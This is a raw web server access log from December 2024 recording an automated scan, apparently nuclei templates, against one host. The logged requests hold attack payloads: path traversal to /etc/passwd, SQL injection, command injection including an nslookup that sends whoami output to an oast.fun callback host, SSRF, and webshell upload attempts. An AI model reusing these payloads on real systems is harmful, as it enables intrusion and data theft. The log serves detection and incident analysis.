Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:76.0)+Gecko/20100101+Firefox/76.0 - 404 7 0 107 2024-12-12 14:09:53 103.153.214.94 POST /run - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.6)+AppleWebKit/616.20+(KHTML,+like+Gecko)+Version/17.1.83+Safari/616.20 - 404 7 0 83 2024-12-12 14:10:06 103.153.214.94 POST /admin/index.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:85.0)+Gecko/20100101+Firefox/85.0 - 404 7 0 106 2024-12-12 14:11:05 103.153.214.94 GET / - 8172 - 147.185.132.160 Expanse,+a+Palo+Alto+Networks+company,+searches+across+the+global+IPv4+space+multiple+times+per+day+to+identify+customers'+presences+on+the+Internet.+If+you+would+like+to+be+excluded+from+our+scans,+please+send+IP+addresses/domains+to:+scaninfo@paloaltonetworks.com - 404 7 0 354 2024-12-12 14:13:05 103.153.214.94 POST / BazaR&vue=saisir&action=saisir_fiche&id=2 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.20 - 404 7 0 78 2024-12-12 14:13:11 103.153.214.94 GET / BazaR&vue=consulter 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.2+Safari/605.1.15 - 404 7 0 62 2024-12-12 14:13:19 103.153.214.94 GET / XDEBUG_SESSION_START=2q3kZ74xoXxVh6U7OwLGteJi5hx 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 89 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/4 - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/93.0.4577.0+Safari/537.36 - 404 7 0 197 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/1 - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 201 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/1 - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/43.0.2357.124+Safari/537.36 - 404 7 0 196 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/10 - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.6.20 - 404 7 0 197 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/7 - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/4 - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.4.22 - 404 7 0 201 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/3 - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:82.0)+Gecko/20100101+Firefox/82.0 - 404 7 0 201 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/1 - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1.2+Safari/605.1.15 - 404 7 0 199 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/2 - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 202 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/5 - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 206 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/5 - 8172 - 156.251.25.152 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1.2)+Gecko/20090729+Firefox/3.5.2+(.NET+CLR+3.5.30729) - 404 7 0 206 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/10 - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 208 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/4 - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11_12)+AppleWebKit/618.17.9+(KHTML,+like+Gecko)+Version/17.4+Safari/618.17.9 - 404 7 0 200 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/5 - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11_6_6;+de)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.2+Safari/605.1.15 - 404 7 0 199 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/3 - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 206 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/3 - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 213 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/9 - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/113.0 - 404 7 0 218 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/6 - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 222 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/2 - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.0+Safari/605.1.15 - 404 7 0 220 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/6 - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 - 404 7 0 223 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/7 - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 239 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/9 - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 241 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/7 - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 253 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/6 - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 222 2024-12-12 14:13:24 103.153.214.94 GET /api/v1/database/2 - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1.3+Safari/605.1.15 - 404 7 0 225 2024-12-12 14:13:29 103.153.214.94 GET /api/v1/database/6 - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:82.0)+Gecko/20100101+Firefox/82.0 - 404 7 0 201 2024-12-12 14:13:29 103.153.214.94 GET /api/v1/database/2 - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/50.0.2661.75+Safari/537.36 - 404 7 0 197 2024-12-12 14:13:29 103.153.214.94 GET /api/v1/database/2 - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 201 2024-12-12 14:13:29 103.153.214.94 GET /api/v1/database/7 - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:81.0)+Gecko/20100101+Firefox/81.0 - 404 7 0 201 2024-12-12 14:13:29 103.153.214.94 GET /api/v1/database/4 - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 - 404 7 0 201 2024-12-12 14:13:29 103.153.214.94 GET /api/v1/database/9 - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 201 2024-12-12 14:13:29 103.153.214.94 GET /api/v1/database/10 - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/617.14+(KHTML,+like+Gecko)+Version/17.4.63+Safari/617.14 - 404 7 0 200 2024-12-12 14:13:29 103.153.214.94 GET /api/v1/database/10 - 8172 - 156.251.25.152 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1.2)+Gecko/20090729+Firefox/3.5.2+(.NET+CLR+3.5.30729) - 404 7 0 205 2024-12-12 14:13:29 103.153.214.94 GET /api/v1/database/1 - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 404 7 0 205 2024-12-12 14:13:29 103.153.214.94 GET /api/v1/database/5 - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12_1_8;+en)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0.4+Safari/605.1.15 - 404 7 0 205 2024-12-12 14:13:29 103.153.214.94 GET /api/v1/database/3 - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 206 2024-12-12 14:13:29 103.153.214.94 GET /api/v1/database/4 - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.22 - 404 7 0 208 2024-12-12 14:13:29 103.153.214.94 GET /api/v1/database/9 - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 212 2024-12-12 14:13:29 103.153.214.94 GET /api/v1/database/6 - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 202 2024-12-12 14:13:29 103.153.214.94 GET /api/v1/database/1 - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11_6_6;+de)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.2+Safari/605.1.15 - 404 7 0 217 2024-12-12 14:13:29 103.153.214.94 GET /api/v1/database/5 - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 224 2024-12-12 14:13:29 103.153.214.94 GET /api/v1/database/3 - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 223 2024-12-12 14:13:31 103.153.214.94 GET /api/v1/database/9 - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 213 2024-12-12 14:13:31 103.153.214.94 GET /api/v1/database/10 - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.13;+rv:71.0)+Gecko/20100101+Firefox/71.0 - 404 7 0 206 2024-12-12 14:13:31 103.153.214.94 GET /api/v1/database/7 - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 218 2024-12-12 14:14:55 103.153.214.94 GET /users/sign_in - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+rv:109.0)+Gecko/20100101+Firefox/118.0 - 404 7 0 231 2024-12-12 14:15:13 103.153.214.94 POST /m/apmarketplace/passwordrecovery - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1.2+Safari/605.1.15 https://bcvt.kontum.gov.vn:8172 404 7 0 41 2024-12-12 14:15:21 103.153.214.94 GET /index.php - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 70 2024-12-12 14:15:21 103.153.214.94 GET /phpMyAdmin/index.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:85.0)+Gecko/20100101+Firefox/85.0 - 404 7 0 51 2024-12-12 14:15:21 103.153.214.94 GET /_phpmyadmin/index.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1.2+Safari/605.1.15 - 404 7 0 57 2024-12-12 14:15:21 103.153.214.94 GET /pma/index.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/618.2.7+(KHTML,+like+Gecko)+Version/17.5+Safari/618.2.7 - 404 7 0 59 2024-12-12 14:15:21 103.153.214.94 GET /pmd/index.php - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 76 2024-12-12 14:15:21 103.153.214.94 GET /phpmyadmin/index.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/95.0.4638.69+Safari/537.36 - 404 7 0 79 2024-12-12 14:15:23 103.153.214.94 POST /CFIDE/adminapi/accessmanager.cfc method=foo&_cfclient=true 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 211 2024-12-12 14:15:35 103.153.214.94 GET /api/imageProxy url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 39 2024-12-12 14:16:10 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 49 2024-12-12 14:16:23 103.153.214.94 POST /api/user/reg - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Mobile/15E148+Safari/604.1 - 404 7 0 39 2024-12-12 14:16:28 103.153.214.94 GET /api/group/list - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 38 2024-12-12 14:18:30 103.153.214.94 GET /api/hassio/app/.%2e/supervisor/info - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.6.1+Safari/605.1.15 - 400 0 0 227 2024-12-12 14:18:35 103.153.214.94 POST /royal_event/companyprofile.php - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 62 2024-12-12 14:18:35 103.153.214.94 POST /login.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.6.1+Safari/605.1.15 - 404 7 0 77 2024-12-12 14:20:33 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 14:21:08 103.153.214.94 GET /EXCU_SHELL - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 47 2024-12-12 14:22:12 103.153.214.94 GET /AgentBoard.XGI user='||'1&cmd=UserLogin 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Mobile/15E148+Safari/604.1 - 404 7 0 51 2024-12-12 14:22:28 103.153.214.94 POST /modules/blocktestimonial/addtestimonial.php - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:100.0)+Gecko/20100101+Firefox/100.0 - 404 7 0 61 2024-12-12 14:22:31 103.153.214.94 POST /modules/cartabandonmentpro/upload.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 90 2024-12-12 14:22:32 103.153.214.94 GET /upload/accaacb.html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.7.19 - 404 7 0 63 2024-12-12 14:22:34 103.153.214.94 GET /modules/cartabandonmentpro/uploads/bbccaac.php.png - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 66 2024-12-12 14:23:19 103.153.214.94 POST /ajax-api/2.0/mlflow/registered-models/create - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.2;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 226 2024-12-12 14:23:25 103.153.214.94 POST /ajax-api/2.0/mlflow/model-versions/create - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 219 2024-12-12 14:23:40 103.153.214.94 POST /(download)/tmp/poc.txt - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 90 2024-12-12 14:23:50 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/100.0.4896.127+Safari/537.36 - 404 7 0 84 2024-12-12 14:24:31 103.153.214.94 POST /texteditor.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.45 - 404 7 0 223 2024-12-12 14:25:39 103.153.214.94 POST /api/edr/sangforinter/v2/cssp/slog_client token=eyJtZDUiOnRydWV9 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 89 2024-12-12 14:26:02 103.153.214.94 POST /login.php - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 90 2024-12-12 14:26:11 103.153.214.94 GET /setup/setupadministrator-start.action - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:12.0)+Gecko/20100101+Firefox/12.0 - 404 7 0 224 2024-12-12 14:26:16 103.153.214.94 GET /server-info.action bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2q6JQO4C4RgoEufpDDopLWaPUPB 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 208 2024-12-12 14:26:23 103.153.214.94 GET /setup/setupadministrator-start.action - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 239 2024-12-12 14:26:30 103.153.214.94 POST /setup/setupadministrator.action - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 223 2024-12-12 14:26:36 103.153.214.94 POST /dologin.action - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 14:26:43 103.153.214.94 GET /welcome.action - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 222 2024-12-12 14:26:58 103.153.214.94 POST /rep/login - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/116.0 - 404 7 0 109 2024-12-12 14:27:03 103.153.214.94 GET /svpn_html/loadfile.php file=/etc/./passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.22 - 404 7 0 88 2024-12-12 14:27:32 103.153.214.94 GET /wp-content/plugins/mstore-api/readme.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.13;+rv:71.0)+Gecko/20100101+Firefox/71.0 - 404 7 0 218 2024-12-12 14:27:32 103.153.214.94 POST /v1/warehouse/pending-events - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 - 404 7 0 219 2024-12-12 14:27:35 103.153.214.94 GET /bypass/config type=sqs&keyId=test&key=security&queueUrl=http://ctd67t3bclspkptm3qo0j3t86cqo8u5kf.oast.fun/ 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 226 2024-12-12 14:27:35 103.153.214.94 POST /ddi/server/fileupload.php uploadDir=upload&name=gidxqQ.php 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.4.19 - 404 7 0 90 2024-12-12 14:27:43 103.153.214.94 GET /ddi/server/upload/gidxqQ.php - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 97 2024-12-12 14:28:10 103.153.214.94 POST /scrm/crm/admin - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:102.0)+Gecko/20100101+Firefox/102.0 - 404 7 0 91 2024-12-12 14:28:12 103.153.214.94 GET /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp user_ids=(99999)+union+all+select+1,2,(md5(999999999)),4 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/42.0.2311.135+Safari/537.36+Edge/12.10240 - 404 7 0 89 2024-12-12 14:28:12 103.153.214.94 POST /seeyon/main.do method=changeLocale 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 100 2024-12-12 14:28:14 103.153.214.94 GET /getsamplebacklog arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).ctd67t3bclspkptm3qo0dt6xxfzpppqbn.oast.fun%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22bcvt.kontum.gov.vn:8172%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 197 2024-12-12 14:28:34 103.153.214.94 GET /_api/web/siteusers - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 243 2024-12-12 14:28:39 103.153.214.94 GET /_api/web/siteusers - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 217 2024-12-12 14:28:41 103.153.214.94 POST /smartbi/vision/RMIServlet windowUnloading&%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18363 - 404 7 0 91 2024-12-12 14:28:41 103.153.214.94 POST /vision/RMIServlet windowUnloading&%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.4.27 - 404 7 0 106 2024-12-12 14:28:56 103.153.214.94 POST /actuator/env - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/91.0.4472.124+Safari/537.3 - 404 7 0 85 2024-12-12 14:32:10 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 85 2024-12-12 14:32:48 103.153.214.94 POST / s=index/index/index 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 83 2024-12-12 14:33:35 103.153.214.94 POST /index.php s=captcha 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/18.0+Safari/605.1.26 - 404 7 0 61 2024-12-12 14:34:13 103.153.214.94 GET /view/systemConfig/management/nmc_sync.php center_ip=127.0.0.1&template_path=|echo+e062b3423b67a69d196210f6dde43f1f+>+T9aAO2.txt|cat 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Mobile/15E148+Safari/604.1 